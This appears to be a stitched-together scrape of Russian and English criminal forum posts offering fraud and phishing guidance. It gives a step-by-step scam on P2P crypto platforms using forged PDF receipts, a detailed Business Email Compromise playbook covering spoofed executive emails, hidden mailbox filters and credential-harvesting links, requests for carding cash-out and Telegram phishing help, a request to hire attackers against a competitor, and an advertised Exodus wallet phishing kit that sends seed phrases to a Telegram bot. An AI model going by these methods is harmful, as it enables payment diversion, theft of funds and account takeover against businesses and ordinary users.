_1. Регаемся на платформах английской аудитории на подобии WhiteBit и прочее.
2. Далее проходим верификациб и начинаем лезть во вкладку P2P.
2.1 Искать мы будем жертву на свое усмотрение желательно искать не
прощаренного в крипте.
2.2 Далее делаем следующие после того как нашли жертву. Спрашиваем реквизиты
банка и смотрим его банк ( важно что бы реквизиты были те котрые не указаны в
P2P)
2.3 После чего находит исходник или же отправляем на подобную карту сумму
денег только минимальную.
2.4 Подключаем Microsoft World от 2016 версии.
2.5 Закидываем туда PDF файл и редактируем под его данные.
2.6 Нажимаем орден оплачен и ждем его. ( Он может начать ждать до талого, нам
нужна поддержка)
2.7 У продавца 2 выбора, либо вернуть деньги, либо по ордеру отдать. Так как
на плодащке запрещены другие реквезиты неуказанные в профиле.
3. Скамим.
3.1 Говорим что хотим что бы вернул деньги в таком случае и даем свой PayPal
или свои реквизиты на которые он должен будет перевести.
3.2 После чего закрываем ордер и пишем ему пока._
Внимание данная статья подойдет только если вынайдет не грамотного торговца, не знающего правила платформы.
Business Email Compromise (BEC) - это переадресация платежей куда нужно вам, пользуясь доступом к емайлам корпорации.
Основные понятия
В корпорациях два типа платежей
1. Исходящие, они называются Account Payable (AP)
2. Входящие, они называются Account Receivable (AR).
Важно понимать, что наша цель не инициировать платеж, а переадресовать его заменив банковские реквизиты. Инициировать тоже можно, но это сложнее и работает в меньшем количестве случаев.
Если мы хотим переадресовать AR, нам понадобится банковский счет на такое же
(это важно) имя компании, но в другом банке. Чтобы узнать эти данные, нам
нужен документ - или Invoice или Wire Instructions. Обычно находятся легко.
Ну а если мы переадресовываем AP, понадобится новый счет на контрагента,
которому пойдут деньги.
Иерархия в корпорациях
Чтобы понимать как переадресовывать платежи, надо понимать кто за них
отвечает.
Chief Financial Officer (CFO) - Финдиректор, главный босс по платежам, в
крупных корпорациях он обычно не занимается непосредственно платежами. В
маленьких компаниях, где фин отдел до 5 человек, он может и сам платежи
высылать.
Controller - подчиненный CFO, обычно в средних и крупных компаниях. В средних
компаниях высылает сам платежи, в крупных обычно нет.
Account payable - клерк нижней ступени, который занимается исходящими
платежами
Account receivable - клерк нижней ступени, который занимается входящими
платежами
Алгоритм разведки
Находим сотрудников, которые занимаются платежами. Способы:
1. Ищем почтовые группы AP, AR, Payments и там будут емайлы сотрудников
2. Ищем на сайте корпорации, через гугл, зуминфо, рокетрич
Далее, мы ищем задолженности AR и AP. Частенько они гуляют в виде эксель
таблиц, если этого нет смотреть платежки и/или инвойсы.
В некоторых фирмах большие суммы в AR, в других в AP а в некоторых и то и
другое.
Выбираем какое направление (AP или AR) будем менять и кто это будет (сам корп
или контрагент).
Теперь время изучить, как осуществляется процесс смены реквизитов.
В маленьких фирмах это может быть просто письмо, или письмо со звонком.
Иногда это можно сделать, дав указание от старшего младшему сотруднку.
Вариантов много, всех не описать.
Вариант 1: если мы поняли, что это делает Account Payable, то делаем фейк письмо от CFO контрагента нашему CFO, и он в виде письма с форвардом дает указание Account Payable. Тут надо аккуратно сделать, чтобы Account Payable не написал контрагенту напрямую.
Вариант 2: делаем емайл контрагента и с него пишем. Можем это сделать с домена контрагента (спуф), или с доменом похожим на контрагента.
Теперь время поработать фильтрами. Если у нас админ доступ, то мы можем сделать фильтр на исходящие письма, чтобы контрагенты не получали письма от корпорации. Если же такого доступа нет - уповаем на удачу.
Также необходимо сделать фильтр входящих, чтобы письма от контрагента не приходили в инбокс а в другую папку. В это время мы весь день уже следим за целевым емайлом, чекаем вручную письма от контрагента если там ничего такого нет вручную перетаскиваем его в инбокс.
Ведь все емайлы активные, одно лишнее движение и вся работа коту под хвост.
Аккуратно работайте с форвардингом писем. Форвардинг обычно отслеживается админом, если не знаете как админка работает, лучше с форвардом не связываться.
В емайлах можно закрепляться. Это не хакерское закрепление с кобальт-страйк, это работает так - находите трастовые емайлы с кем переписывается человек, и делаете похожий емайл. Лучше, если этот диалог содержит какие то файлы. Далее, вклиниваетесь в диалог и сохраняете инфу. Если доступ к ящику потеряете, можете инициировать диалог заново - например, сказать "вот таблица это верный вариант?" а доступ к таблице по ссылке сделать чтобы человек вводил данные ящика и в итоге там эта таблица была.
Выводы
Переадресация платежей работает не всегда. Очень важно проявить терпение и
дождаться хорошего момента. Например, когда компания по каким то причинам
хочет изменить свой банк на другой. С другой стороны, если только выжидать то
особо и не переадресуешь ничего. Там уже надо смотреть по ситуации, а это
придет только с опытом. Опыт - это сотни тысяч, которые вы потеряете из-за
ошибок. Но с каждой ошибкой будет расти скилл. Хороший BEC позволяет высылать
платежи неделями, или получить десяток платежей с одной подмены.
В некоторых корпорациях BEC сделать невозможно из-за алгоритма смены
реквизитов, но какой это алгоритм - уже за рамками данного поста.
Бонус-трэк
Вы нашли емайл где неделю-две назад компания поменяла реквизиты банковского
счета. Шанс упущен? Не-а. Есть такая процедура, отзыв письма. Просите отозвать
письмо с данными как некорректное и пишете корректное со своими данными.
Будьте готовы, что надо будет сделать прозвон или принятие звонка, возможно
даже несколько. Если все правильно сделать, платежи пойдут куда надо вам.
Всем удачи!
Ваш бро - Винни-Пых.
Hello guys, what are some of the best methods of cashing when you have cc info?
Всем привет. Хочу самостоятельно создать копию сайта telegram. Чтобы это был фишинговый сайт. То есть человек, переходя по моей ссылке(социальная инженерия), будет заново входить в свой аккаунт, я при этом буду видеть, что он вводит и повторно заходить к нему на аккаунт другой сессией.
Какие статьи/полезные материалы/информацию можете посоветовать для самостоятельного изучения и написания данного кода.
Всем добра!
Добрый день уважаемые форумчане.
Столкнулся с проблемой что мой сайт скопировали, накрутили пф и вышли выше нас
в яндексе.
Продвигаются по нашим тегам и наши клиенты попадая на сайт удачно НАЕБЫВАЮТСЯ
Вобщем ближе к делу.
Нужен софт или услуги взломщиков жопы. Что бы снести нахуй его сайт, или
получить доступ. Снести номера, вотсапп тг и инсту. Все что можно по
максимуму.
Бюджет есть пишите с реальными услугами и советам как попортить жизнь
долбоебу, чем жестче тем лучше.
Любые способы могут быть полезны
Отвечу всем без исключения
Что его тригерит и как это исправить?
Пару часов повисит, домен с регвея через клаудфаер и всё
Смерть
вбил farfetch и он рефает заказ, из за чего такое может быть?
ENG:
Phishing page for exodus that extracts the seed phrase entered by the user in
a wallet "recovery" scenario.
Project is based on the interface of the exodus browser extension.
Project was initially commissioned by an individual and made to his specifications but was abandoned partly way through, so still can do with some improvements.
Delivery of entered logs is via telegram bot.
Please enter the relevant details of your bot token/telegram user id in the
variables under the monikers:
"botToken"
"chatId"
The variables that require changing are found within the file named "lol.php" -found within the "files" directory"-
If anybody is interested I also have a source for the hardware wallet "Trezor" that is better code quality and UI wise
Demonstration of phish is provided below
RU:
Фишинговая страница для exodus, которая извлекает начальную фразу, введенную
пользователем в сценарии "восстановления" кошелька.
Проект основан на интерфейсе браузерного расширения exodus.
Изначально проект был заказан одному человеку и сделан по его спецификации, но был заброшен на полпути, так что все еще может быть немного улучшен.
Доставка введенных логов осуществляется через telegram-бота.
Пожалуйста, введите соответствующие данные вашего бот-токена/идентификатора
пользователя Telegram в переменные под мониками:
"botToken"
"chatId"
Переменные, требующие изменения, находятся в файле с именем "lol.php" - находится в директории "files".
Если кому-то интересно, у меня также есть источник для аппаратного кошелька "Trezor", который лучше по качеству кода и пользовательскому интерфейсу.
Демонстрация фишинга приведена ниже
You must have at least 1 reaction(s) to view the content.
==Listen To Become A Successfully Phisher/Spammer/Carder Online This days is Very Very Harder If You Don 't Use The Right Source & Right Guides==
:Becoming successful online involves a combination of strategic planning, hard work, continuous learning, and adaptability. Here are some key steps to help you achieve success online in your CCs,Banks logs,BEC invoice Logs:
efine Your Goals: Clearly define what success means to you. Whether it's building a profitable business, gaining a large following, or making a positive impact, having clear goals will guide your efforts.
:Identify Your Niche: Find a niche or area of expertise that aligns with your passions, skills, and Email-market demand. Research your target Companies audience to understand their needs how to manipulate their system maibox, preferences, and pain points.
:Create High-Quality Content like htmls Letter/PlainText letter with AI and valid spelling spam-checker with AI-EMAIL-FILTER: Your last working should be on mailer to focus on delivering high-quality content like >>Subject reasonable contents words,Sender name reasonable Words with encoded to bypass spam filtering bot,
:Stay Persistent and Patient: Success doesn't happen overnight. Stay persistent, patient, and resilient in the face of challenges and setbacks. Keep working hard and learning from your experiences as you progress toward your goals.
: Here I made New.2024.march Private Live tutorial three part of videos. it main for Intermediate Spammer/Phisher or Smart Learner beginner.
: fluxfastpanel(.)sellsn(.)io